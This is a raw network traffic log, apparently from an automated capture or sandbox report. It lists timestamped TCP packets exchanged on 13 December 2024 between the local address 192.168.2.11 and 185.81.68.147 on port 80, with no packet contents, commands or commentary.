                                                                                                                                                                                                Dec 13, 2024 08:20:07.895610094 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.895668983 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.895726919 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.895771027 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.898478031 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.898544073 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.898581982 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.898626089 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.901406050 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.901488066 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.901618958 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.901618958 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.907027006 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.907042980 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.907130957 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.909246922 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.909308910 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.909378052 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.909509897 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.912112951 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.912189960 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.912291050 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.912421942 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.915045977 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.915059090 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.915118933 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.915160894 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.915813923 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.915930033 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.915982008 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.918692112 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.918819904 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.918900967 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.921583891 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.921686888 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.921753883 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.924633026 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.925772905 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.925846100 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.929344893 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.929508924 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.929577112 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.932126999 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.932301998 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.932377100 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.933490992 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.933504105 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.933543921 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.933581114 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.935986042 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.936053038 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.936110020 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.938915968 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.939052105 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.939080000 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.939110994 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.941956043 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.942014933 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.942037106 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.942084074 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.045506954 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.045593023 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.045600891 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.045687914 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.046739101 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.046794891 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.046853065 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.046911955 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.049351931 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.049402952 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.049518108 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.049571991 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.051902056 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.051951885 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.052022934 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.052062988 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.054367065 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.054435968 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.054485083 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.054527044 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.056965113 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.057013035 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.057044029 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.057082891 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.059387922 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.059444904 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.059463978 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.059483051 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.061773062 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.061827898 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.061847925 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.061882973 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.064071894 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.064136028 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.064177036 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.064220905 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.066373110 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.066423893 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.066457033 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.066622019 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.068635941 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.068716049 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.068727970 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.068774939 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.070878983 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.070969105 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.070998907 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.071044922 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.073084116 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.073191881 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.073251009 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.075352907 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.075444937 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.075467110 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.075479984 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.077616930 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.077677965 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.077725887 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.077775002 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.079818010 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.079894066 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.079966068 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.080009937 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.082112074 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.082142115 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.082190037 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.084336996 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.084391117 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.084413052 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.084517002 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.086564064 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.086649895 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.086652040 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.086690903 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.088753939 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.088821888 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.088864088 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.088924885 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.091013908 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.091094971 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.091159105 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.091207027 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.093215942 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.093290091 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.093331099 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.093379021 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.095495939 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.095550060 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.095578909 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.095612049 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.097776890 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.097851038 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.097876072 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.097935915 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.099973917 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.100029945 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.100121975 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.100167036 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.102195978 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.102288961 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.102300882 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.102399111 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.104551077 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.104603052 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.104669094 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.104912996 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.106663942 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.106709003 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.106784105 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.106864929 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.108942986 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.108989954 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.109023094 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.109057903 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.111146927 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.111244917 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.111290932 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.113392115 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.113440990 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.113528013 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.113718033 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.115611076 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.115664005 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.115673065 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.115710020 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.117836952 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.117937088 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.117969036 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.118005991 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.120068073 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.120146036 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.120181084 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.120428085 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.122400999 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.122477055 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.122518063 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.122555971 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.124552011 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.124634027 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.124658108 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.124697924 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.126817942 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.126904964 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.126935005 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.126982927 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.129050016 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.129127026 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.129132032 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.129173994 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.131273985 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.131350040 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.131376028 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.131427050 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.133521080 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.133598089 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.133601904 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.133641005 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.135796070 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.135864973 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.135895967 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.135938883 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.137959003 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.138006926 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.138048887 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.138092041 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.140239954 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.140274048 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.140316010 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.140367031 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.142482996 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.142550945 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.142627954 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.144690037 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.144764900 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.144834042 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.144881964 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.146904945 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.146965027 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.147008896 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.147051096 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.149152040 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.149175882 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.149211884 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.149239063 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.151402950 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.151473999 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.151499033 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.151540041 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.153639078 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.153670073 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.153856039 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.155859947 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.155961990 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.156023026 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.158127069 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.158199072 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.158217907 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.158349991 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.160337925 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.160454988 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.160481930 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.160512924 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.162570953 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.162617922 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.162718058 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.162763119 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.164853096 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.164974928 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.165024042 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.167083979 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.167162895 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.167165995 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.167216063 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.169261932 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.169306040 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.169306993 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.169349909 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.238328934 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.238368034 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.238447905 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.238800049 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.238848925 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.238924026 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.240673065 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.240741014 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.240756989 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:08.240802050 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:08.242507935 CET8049938185.81.68.147192.168.2.11
